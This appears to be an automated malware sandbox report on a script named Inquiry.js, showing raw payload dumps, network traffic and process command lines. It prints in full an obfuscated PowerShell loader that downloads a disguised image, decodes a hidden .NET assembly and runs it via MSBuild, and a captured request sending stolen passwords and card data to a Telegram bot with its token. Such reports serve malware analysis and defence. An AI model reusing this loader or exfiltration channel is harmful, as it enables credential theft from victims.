                                                                                                                                                    2025-01-15 08:58:35 UTC7982INData Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                    Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                    2025-01-15 08:58:35 UTC8000INData Raw: 51 4b 53 55 78 41 48 49 68 44 4f 49 67 41 41 55 67 44 4f 34 67 44 4f 51 41 41 48 67 67 44 4f 55 51 48 45 63 77 42 4f 55 51 48 42 41 53 42 42 4d 42 41 54 45 67 41 67 63 51 42 64 34 67 41 52 49 52 46 48 49 67 41 42 41 41 42 4f 30 49 67 53 45 41 49 47 30 49 67 53 41 41 49 46 67 67 41 43 63 41 42 43 67 67 41 43 41 53 42 4f 49 51 41 43 41 53 42 49 30 54 67 53 49 77 42 47 45 54 67 53 55 69 45 42 41 77 42 31 45 59 45 42 45 41 49 47 34 67 44 4f 34 77 41 41 59 51 4b 42 47 52 41 42 41 67 42 5a 45 59 45 5a 45 59 45 64 45 59 45 43 41 77 43 5a 45 59 45 41 41 51 42 4e 41 41 49 44 67 51 48 42 47 52 47 42 47 42 43 45 63 67 43 56 45 6f 45 56 45 6f 45 43 49 41 41 4a 55 52 67 53 41 41 41 46 55 69 45 41 41 41 42 49 45 77 42 44 67 67 44 4f 34 67 44 4f 34 67 44 4f 34 67 44 4f
                                                                                                                                                    Data Ascii: QKSUxAHIhDOIgAAUgDO4gDOQAAHggDOUQHEcwBOUQHBASBBMBATEgAgcQBd4gARIRFHIgABAABO0IgSEAIG0IgSAAIFggACcABCggACASBOIQACASBI0TgSIwBGETgSUiEBAwB1EYEBEAIG4gDO4wAAYQKBGRABAgBZEYEZEYEdEYECAwCZEYEAAQBNAAIDgQHBGRGBGBCEcgCVEoEVEoECIAAJURgSAAAFUiEAAABIEwBDggDO4gDO4gDO4gDO
                                                                                                                                                    2025-01-15 08:58:35 UTC8000INData Raw: 67 2b 41 59 4e 41 35 6e 44 41 41 30 46 41 64 42 51 63 41 30 57 43 41 41 51 73 41 45 4c 41 31 43 77 31 41 51 4f 41 6b 44 67 34 41 41 63 45 42 45 41 47 42 67 43 41 35 44 67 2b 4a 45 51 41 62 41 51 37 41 34 66 41 42 45 41 49 41 6b 50 41 61 48 67 43 42 73 42 41 34 44 77 2f 42 45 41 41 58 44 51 39 41 6b 64 41 4a 45 51 48 41 73 4e 41 5a 48 51 43 42 63 42 41 35 44 77 2f 42 41 51 41 52 45 77 45 41 34 65 41 4a 45 67 48 41 6b 4f 41 2f 48 41 41 42 46 41 41 35 48 51 45 41 34 65 41 57 45 41 4a 42 6f 41 41 76 48 77 48 42 67 43 41 74 48 51 41 42 59 52 41 78 45 67 45 41 34 65 41 66 45 43 41 41 30 4c 41 39 43 51 77 41 51 4f 41 30 43 67 31 41 63 4d 41 6b 48 52 41 41 45 4f 41 68 44 51 35 41 34 66 41 55 41 51 33 41 6f 65 41 49 45 41 44 42 77 41 41 57 44 51 2f 5a 41 41 41 43
                                                                                                                                                    Data Ascii: g+AYNA5nDAA0FAdBQcA0WCAAQsAELA1Cw1AQOAkDg4AAcEBEAGBgCA5Dg+JEQAbAQ7A4fABEAIAkPAaHgCBsBA4Dw/BEAAXDQ9AkdAJEQHAsNAZHQCBcBA5Dw/BAQAREwEA4eAJEgHAkOA/HAABFAA5HQEA4eAWEAJBoAAvHwHBgCAtHQABYRAxEgEA4eAfECAA0LA9CQwAQOA0Cg1AcMAkHRAAEOAhDQ5A4fAUAQ3AoeAIEADBwAAWDQ/ZAAAC
                                                                                                                                                    2025-01-15 08:58:35 UTC8000INData Raw: 4c 41 32 43 41 72 41 45 4c 41 36 42 77 65 41 6f 4b 41 2f 43 67 67 41 59 4c 41 61 6d 52 41 41 30 4e 41 64 44 51 38 41 41 50 41 5a 44 41 30 41 51 50 41 77 44 51 32 41 41 4e 41 30 44 41 38 41 6b 4e 41 51 44 41 39 41 41 50 41 5a 44 41 30 41 51 50 41 77 44 51 32 41 41 4e 41 30 44 41 38 41 6b 4e 41 51 44 41 39 41 41 50 41 5a 44 41 30 41 51 50 41 77 44 51 32 41 41 4e 41 30 44 41 38 41 6b 4e 41 51 44 41 39 41 41 50 41 5a 48 77 44 41 45 50 41 6b 6e 46 41 41 73 4a 41 6a 43 41 69 41 34 49 41 6c 42 41 72 41 73 49 41 4e 43 77 69 41 51 4b 41 46 43 41 65 5a 41 41 41 42 44 51 77 41 55 4d 41 4e 44 67 75 41 6b 4e 41 62 44 67 35 41 77 4f 41 35 43 77 37 41 63 4d 41 53 44 41 74 41 67 4e 41 55 44 51 76 41 51 4c 41 59 44 41 31 41 30 4c 41 30 43 41 32 41 51 4e 41 39 43 41 74 41
                                                                                                                                                    Data Ascii: LA2CArAELA6BweAoKA/CggAYLAamRAA0NAdDQ8AAPAZDA0AQPAwDQ2AANA0DA8AkNAQDA9AAPAZDA0AQPAwDQ2AANA0DA8AkNAQDA9AAPAZDA0AQPAwDQ2AANA0DA8AkNAQDA9AAPAZHwDAEPAknFAAsJAjCAiA4IAlBArAsIANCwiAQKAFCAeZAAABDQwAUMANDguAkNAbDg5AwOA5Cw7AcMASDAtAgNAUDQvAQLAYDA1A0LA0CA2AQNA9CAtA
                                                                                                                                                    2025-01-15 08:58:35 UTC8000INData Raw: 41 49 42 45 54 41 41 45 67 44 42 73 52 41 71 45 51 47 42 38 51 41 70 41 41 2b 42 30 51 41 30 45 51 49 42 4d 54 41 5a 45 41 44 42 38 52 41 76 45 51 47 42 38 52 41 67 45 41 44 42 6b 51 41 77 45 67 4b 42 4d 54 41 56 45 77 48 42 30 52 41 71 45 51 48 42 34 52 41 70 45 51 50 42 45 52 41 50 45 41 4b 42 73 51 41 2f 45 51 48 42 45 53 41 36 45 77 4b 41 6b 66 41 70 45 51 50 42 73 53 41 4d 45 77 48 78 44 49 41 41 55 4e 41 78 43 77 75 41 77 4c 41 58 44 51 71 41 6f 4b 41 48 44 77 7a 41 51 4a 41 54 43 77 75 41 38 4d 41 55 43 51 6c 41 55 4d 41 63 44 77 79 41 55 4a 41 30 6d 43 41 41 4d 4e 41 64 43 51 31 41 49 4d 41 58 44 41 33 41 55 4e 41 4b 44 51 32 41 51 4e 41 61 43 51 79 41 41 4e 41 4d 44 67 6d 41 49 4d 41 59 44 51 6d 41 38 4b 41 4a 44 67 32 41 77 4e 41 76 43 51 79 41
                                                                                                                                                    Data Ascii: AIBETAAEgDBsRAqEQGB8QApAA+B0QA0EQIBMTAZEADB8RAvEQGB8RAgEADBkQAwEgKBMTAVEwHB0RAqEQHB4RApEQPBERAPEAKBsQA/EQHBESA6EwKAkfApEQPBsSAMEwHxDIAAUNAxCwuAwLAXDQqAoKAHDwzAQJATCwuA8MAUCQlAUMAcDwyAUJA0mCAAMNAdCQ1AIMAXDA3AUNAKDQ2AQNAaCQyAANAMDgmAIMAYDQmA8KAJDg2AwNAvCQyA
                                                                                                                                                    2025-01-15 08:58:35 UTC8000INData Raw: 48 41 38 42 77 68 41 77 4a 41 2b 42 51 6a 41 38 49 41 76 43 77 69 41 73 48 41 4e 43 51 6f 41 6b 4a 41 38 42 77 6a 41 73 48 41 74 43 77 65 41 6b 4a 41 69 43 67 62 41 63 47 41 59 43 77 71 41 38 48 41 6f 42 67 6a 41 55 4b 41 6d 42 67 65 41 30 59 2b 41 43 41 41 71 43 51 6a 41 4d 4a 41 55 43 51 69 41 51 48 41 52 43 51 6c 41 6b 4b 41 4e 43 67 6b 41 30 59 47 41 41 77 74 41 63 4c 41 4c 44 77 30 41 67 4f 41 7a 43 77 35 41 4d 4e 41 72 44 77 73 41 63 4f 41 62 44 51 35 41 49 50 41 42 44 77 32 41 55 4f 41 7a 43 51 30 41 51 4e 41 6b 44 67 34 41 77 4b 41 62 44 67 34 41 4d 4c 41 73 43 77 30 41 51 4f 41 41 44 41 72 41 4d 4e 41 6e 44 41 79 41 45 4d 41 63 44 77 37 41 77 4d 41 6e 44 77 30 41 6b 4f 41 55 44 51 77 41 77 4e 41 73 44 67 38 41 73 4b 41 64 44 41 36 41 38 4b 41 52
                                                                                                                                                    Data Ascii: HA8BwhAwJA+BQjA8IAvCwiAsHANCQoAkJA8BwjAsHAtCweAkJAiCgbAcGAYCwqA8HAoBgjAUKAmBgeA0Y+ACAAqCQjAMJAUCQiAQHARCQlAkKANCgkA0YGAAwtAcLALDw0AgOAzCw5AMNArDwsAcOAbDQ5AIPABDw2AUOAzCQ0AQNAkDg4AwKAbDg4AMLAsCw0AQOAADArAMNAnDAyAEMAcDw7AwMAnDw0AkOAUDQwAwNAsDg8AsKAdDA6A8KAR
                                                                                                                                                    2025-01-15 08:58:35 UTC8000INData Raw: 66 41 64 45 67 48 42 41 51 41 50 45 41 45 42 4d 53 41 76 41 51 36 42 41 42 41 77 48 67 49 42 38 51 41 52 45 51 4b 41 6b 66 41 67 45 41 41 4a 42 41 41 38 42 41 69 41 49 4a 41 50 43 77 71 41 41 48 41 57 43 41 6d 41 51 4c 41 42 43 67 6b 41 6b 4a 41 79 43 77 71 41 77 4b 41 5a 43 51 74 41 6b 49 41 48 43 67 6f 41 59 4b 41 69 43 67 63 41 45 4b 41 75 43 51 6a 41 63 49 41 49 43 41 74 41 55 49 41 47 43 51 6f 41 49 48 41 42 43 67 67 41 41 4b 41 35 43 51 6b 41 63 4a 41 5a 43 41 74 41 45 49 41 6f 43 51 69 41 77 4b 41 41 43 67 6b 41 77 49 41 32 43 41 67 41 4d 4a 41 4e 43 51 63 41 41 49 41 43 43 67 6f 41 6b 4b 41 6e 43 51 63 41 67 4a 41 6d 43 41 6a 41 38 47 41 4c 47 49 67 41 41 77 31 41 77 4e 41 37 43 51 74 41 73 4d 41 74 43 41 72 41 67 4d 41 65 44 67 74 41 45 4e 41 47
                                                                                                                                                    Data Ascii: fAdEgHBAQAPEAEBMSAvAQ6BABAwHgIB8QAREQKAkfAgEAAJBAA8BAiAIJAPCwqAAHAWCAmAQLABCgkAkJAyCwqAwKAZCQtAkIAHCgoAYKAiCgcAEKAuCQjAcIAICAtAUIAGCQoAIHABCggAAKA5CQkAcJAZCAtAEIAoCQiAwKAACgkAwIA2CAgAMJANCQcAAIACCgoAkKAnCQcAgJAmCAjA8GALGIgAAw1AwNA7CQtAsMAtCArAgMAeDgtAENAG
                                                                                                                                                    2025-01-15 08:58:35 UTC8000INData Raw: 77 42 42 73 41 41 34 44 51 2b 41 4d 4e 41 32 44 77 35 42 51 51 41 49 45 41 42 42 73 41 41 6a 6e 43 41 41 41 47 41 6b 42 41 6a 41 49 48 41 30 42 77 6a 41 67 47 41 73 42 67 6c 41 6b 47 41 51 43 51 68 41 77 4a 41 35 42 67 61 41 63 49 41 59 43 77 6a 41 34 49 41 6d 6c 53 41 42 67 52 41 67 41 51 39 42 59 41 41 37 44 77 38 41 51 66 41 54 45 51 47 41 59 65 41 65 45 41 46 42 30 52 41 44 41 51 2b 42 59 42 41 33 48 51 49 42 67 52 41 41 45 67 41 42 30 52 41 63 41 41 39 78 41 41 41 72 42 67 58 41 49 49 41 2b 42 77 5a 41 34 46 41 43 43 67 66 41 63 47 41 65 42 67 67 41 34 48 41 6e 42 67 58 41 49 49 41 2b 42 77 5a 41 34 46 41 43 43 67 66 41 63 47 41 65 42 67 67 41 34 48 41 6e 42 67 58 41 49 49 41 2b 42 77 5a 41 34 46 41 43 43 67 66 41 63 47 41 65 42 67 67 41 34 48 41 6e
                                                                                                                                                    Data Ascii: wBBsAA4DQ+AMNA2Dw5BQQAIEABBsAAjnCAAAGAkBAjAIHA0BwjAgGAsBglAkGAQCQhAwJA5BgaAcIAYCwjA4IAmlSABgRAgAQ9BYAA7Dw8AQfATEQGAYeAeEAFB0RADAQ+BYBA3HQIBgRAAEgAB0RAcAA9xAAArBgXAIIA+BwZA4FACCgfAcGAeBggA4HAnBgXAIIA+BwZA4FACCgfAcGAeBggA4HAnBgXAIIA+BwZA4FACCgfAcGAeBggA4HAn
                                                                                                                                                    2025-01-15 08:58:35 UTC8000INData Raw: 67 4a 42 55 51 41 6e 45 51 4a 42 59 53 41 54 45 67 4c 41 49 50 41 72 48 67 45 68 41 41 41 32 43 51 72 41 73 4b 41 62 44 77 38 41 6b 4f 41 6d 44 51 78 41 63 4f 41 6c 44 67 35 41 4d 4e 41 75 44 67 73 41 73 4b 41 53 48 43 41 41 34 4b 41 42 43 67 62 41 34 5a 43 42 45 77 45 41 59 4f 41 54 48 77 41 4a 45 41 41 78 44 51 38 42 55 51 41 4f 45 67 49 41 6f 66 41 68 45 77 46 42 6f 53 41 47 41 77 35 42 6b 51 41 62 45 77 4b 42 73 51 41 4e 45 67 48 41 30 4f 41 37 48 41 43 70 45 41 41 6e 42 77 5a 41 73 48 41 45 43 41 6d 41 41 48 41 58 43 51 6a 41 41 4b 41 38 42 51 58 41 38 48 41 52 43 51 6f 41 45 49 41 44 43 41 6c 41 4d 47 41 78 42 67 66 70 45 51 41 43 41 67 2b 41 30 4f 41 76 48 77 44 41 38 4d 41 64 44 67 2b 41 6f 4f 41 59 44 77 2f 41 67 66 41 4d 45 67 41 41 67 4d 41 35
                                                                                                                                                    Data Ascii: gJBUQAnEQJBYSATEgLAIPArHgEhAAA2CQrAsKAbDw8AkOAmDQxAcOAlDg5AMNAuDgsAsKASHCAA4KABCgbA4ZCBEwEAYOATHwAJEAAxDQ8BUQAOEgIAofAhEwFBoSAGAw5BkQAbEwKBsQANEgHA0OA7HACpEAAnBwZAsHAECAmAAHAXCQjAAKA8BQXA8HARCQoAEIADCAlAMGAxBgfpEQACAg+A0OAvHwDA8MAdDg+AoOAYDw/AgfAMEgAAgMA5
                                                                                                                                                    2025-01-15 08:58:35 UTC8000INData Raw: 57 64 72 42 41 65 70 68 58 59 72 39 57 65 76 46 58 5a 6f 56 58 63 6c 31 47 41 34 6c 6d 64 6c 31 57 59 71 39 47 64 70 78 57 5a 30 56 6d 65 41 67 58 61 30 56 33 5a 70 64 48 41 34 6c 47 64 76 70 57 59 74 56 32 59 76 4a 58 5a 6d 46 47 65 68 5a 32 62 79 42 41 65 70 52 58 5a 6f 56 48 63 70 4e 58 64 30 42 41 65 70 52 58 59 6b 56 32 63 41 67 58 61 7a 56 48 5a 70 52 57 59 77 56 6e 5a 41 67 58 61 7a 39 6d 61 31 6c 48 41 34 6c 32 63 6c 74 57 59 79 39 57 65 6c 70 57 64 71 56 58 62 6c 46 33 62 7a 42 41 65 70 4a 58 64 73 56 6e 5a 70 70 58 5a 78 42 41 65 70 4a 58 61 74 46 6d 63 41 67 58 61 78 56 48 62 31 5a 47 41 34 6c 57 63 76 52 57 5a 77 42 41 65 70 46 58 61 6e 39 6d 62 6c 52 57 59 32 6c 6d 59 68 4a 48 41 34 6c 57 63 6c 70 57 5a 6a 42 41 65 70 42 58 64 30 39 47 63 41
                                                                                                                                                    Data Ascii: WdrBAephXYr9WevFXZoVXcl1GA4lmdl1WYq9GdpxWZ0VmeAgXa0V3ZpdHA4lGdvpWYtV2YvJXZmFGehZ2byBAepRXZoVHcpNXd0BAepRXYkV2cAgXazVHZpRWYwVnZAgXaz9ma1lHA4l2cltWYy9WelpWdqVXblF3bzBAepJXdsVnZppXZxBAepJXatFmcAgXaxVHb1ZGA4lWcvRWZwBAepFXan9mblRWY2lmYhJHA4lWclpWZjBAepBXd09GcA


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    3192.168.2.449741149.154.167.2204433412C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-15 08:58:45 UTC233OUTPOST /bot8122064310:AAFBCVyMfJVoD3s1eB-6ymRD9cZooNbGkNo/sendDocument HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638725145275971619
                                                                                                                                                    Host: api.telegram.org
                                                                                                                                                    Content-Length: 5113
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    2025-01-15 08:58:45 UTC1024OUTData Raw: 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 37 32 35 31 34 35 32 37 35 39 37 31 36 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 32 30 34 31 32 31 35 34 31 32 0d 0a 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 37 32 35 31 34 35 32 37 35 39 37 31 36 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 54 65 73 74 20 7c 20 43 6c 69 65 6e 74 20 4e 61 6d 65 3a 20 23 6a 6f 6e 65 73 0d 0a 50 61 73 73 77 6f 72 64 73 3a 20 30 0d 0a 43 72 65 64 69 74 43 61 72 64 73 3a 20 30 0d 0a 41 75 74 6f 46
                                                                                                                                                    Data Ascii: -----TelegramBotAPI_638725145275971619Content-Disposition: form-data; name="chat_id"2041215412-----TelegramBotAPI_638725145275971619Content-Disposition: form-data; name="caption"Test | Client Name: #userPasswords: 0CreditCards: 0AutoF
                                                                                                                                                    2025-01-15 08:58:45 UTC4045OUTData Raw: 65 73 2e 74 78 74 cd 57 cb 8e a3 48 16 5d d3 52 ff 46 6d 2c 32 09 22 02 22 16 b9 e0 ed 07 d8 18 fc c0 de a4 00 83 8d c1 60 1e 06 db 1a d5 b7 0f e5 ea ae ee 1e d5 54 66 a9 72 a4 89 05 12 52 28 ce 8d 7b cf 3d e7 c6 d3 be 28 f6 59 f4 14 16 27 66 e1 2c 35 e6 99 d1 25 d3 d5 18 00 21 16 04 40 04 0e 0a 44 00 14 32 d3 91 ca 60 00 5e 8e c4 9d 2f 17 59 93 af 96 38 9c 49 d1 ed 5e ba d7 35 5b 0e 67 7e ea 5c e4 a1 3a 37 cc 85 11 85 91 42 b7 b8 72 ee 29 6e 2a 6b 12 20 e5 b2 55 5e 15 fd 14 8a 13 bd 9b 87 ce d8 64 4b e3 4e ac 36 4d ef d6 f6 a4 65 ad 27 e9 6b 73 c6 2e ec 2d b5 ad 52 de 48 22 d9 4a 17 3f 3a e7 de c8 19 46 ec 42 2a b2 55 b1 16 b6 e2 6e 9e 97 e7 fd cd e3 4e ec e2 e4 8a 7c 10 05 d2 be 28 b7 2d 36 d2 b3 a3 2f c3 ed a8 03 93 f4 f7 df 5e 7e b4 7e ff ad be 9c cf
                                                                                                                                                    Data Ascii: es.txtWH]RFm,2""`TfrR({=(Y'f,5%!@D2`^/Y8I^5[g~\:7Br)n*k U^dKN6Me'ks.-RH"J?:FB*UnN|(-6/^~~
                                                                                                                                                    2025-01-15 08:58:45 UTC44OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 37 32 35 31 34 35 32 37 35 39 37 31 36 31 39 2d 2d 0d 0a
                                                                                                                                                    Data Ascii: -----TelegramBotAPI_638725145275971619--
                                                                                                                                                    2025-01-15 08:58:46 UTC388INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                    Date: Wed, 15 Jan 2025 08:58:46 GMT
                                                                                                                                                    Content-Type: application/json
                                                                                                                                                    Content-Length: 971
                                                                                                                                                    Connection: close
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                    2025-01-15 08:58:46 UTC971INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 32 32 30 36 34 33 31 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 74 74 78 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 61 6e 74 74 78 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 34 31 32 31 35 34 31 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 75 6b 6b 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 75 6b 6b 79 31 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 39 33 31 35 32 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 6a 6f 6e 65 73
                                                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":121,"from":{"id":8122064310,"is_bot":true,"first_name":"ttxx","username":"banttxx_bot"},"chat":{"id":2041215412,"first_name":"Bukky","username":"bukky101","type":"private"},"date":1736931526,"document":{"file_name":"user


                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Target ID:0
                                                                                                                                                    Start time:03:58:05
                                                                                                                                                    Start date:15/01/2025
                                                                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry.js"
                                                                                                                                                    Imagebase:0x7ff7c4120000
                                                                                                                                                    File size:170'496 bytes
                                                                                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:1
                                                                                                                                                    Start time:03:58:08
                                                                                                                                                    Start date:15/01/2025
                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zKmKBBAfbUGnsWxhAiiz = New-Object System.Net.WebClient;$tZUoLPcfaNfWNPPuuQNL = $zKmKBBAfbUGnsWxhAiiz.DownloadData($ImGAeKuoWcnmOsioRbWc);$UoOZAzuAcLvSicAcLKuh = [System.Text.Encoding]::UTF8.GetString($tZUoLPcfaNfWNPPuuQNL);$CkcWWOGxjxbeZAUGPTSp = '<<BASE64_START>>';$ZrcCaGWcoRxzHkkulGiZ = '<<BASE64_END>>';$CbqKcPceQgaPcoZgIaAi = $UoOZAzuAcLvSicAcLKuh.IndexOf($CkcWWOGxjxbeZAUGPTSp);$tmpOdLZZHhJCGJfWbiRf = $UoOZAzuAcLvSicAcLKuh.IndexOf($ZrcCaGWcoRxzHkkulGiZ);$CbqKcPceQgaPcoZgIaAi -ge 0 -and $tmpOdLZZHhJCGJfWbiRf -gt $CbqKcPceQgaPcoZgIaAi;$CbqKcPceQgaPcoZgIaAi += $CkcWWOGxjxbeZAUGPTSp.Length;$aWiLuziLfnZnGLeRZrin = $tmpOdLZZHhJCGJfWbiRf - $CbqKcPceQgaPcoZgIaAi;$siibUOizcbQuLNGKWfWc = $UoOZAzuAcLvSicAcLKuh.Substring($CbqKcPceQgaPcoZgIaAi, $aWiLuziLfnZnGLeRZrin);$uSqTKGlifAbAKeLRUmfk = -join ($siibUOizcbQuLNGKWfWc.ToCharArray() | ForEach-Object { $_ })[-1..-($siibUOizcbQuLNGKWfWc.Length)];$iqfeZGJtzAJhdcBqdzmR = [System.Convert]::FromBase64String($uSqTKGlifAbAKeLRUmfk);$nZGHGkTBZPiLBmWnLiec = [System.Reflection.Assembly]::Load($iqfeZGJtzAJhdcBqdzmR);$qbPKWBeczbjsBndzhNnZ = [dnlib.IO.Home].GetMethod('VAI');$qbPKWBeczbjsBndzhNnZ.Invoke($null, @($restoredText, 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'MSBuild', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','1','WfWxdqKLzhtiOjUlGsfz','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:2
                                                                                                                                                    Start time:03:58:08
                                                                                                                                                    Start date:15/01/2025
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:6
                                                                                                                                                    Start time:03:58:35
                                                                                                                                                    Start date:15/01/2025
                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                    File size:262'432 bytes
                                                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:7
                                                                                                                                                    Start time:03:58:35
                                                                                                                                                    Start date:15/01/2025
                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                    Imagebase:0xf90000
                                                                                                                                                    File size:262'432 bytes
                                                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
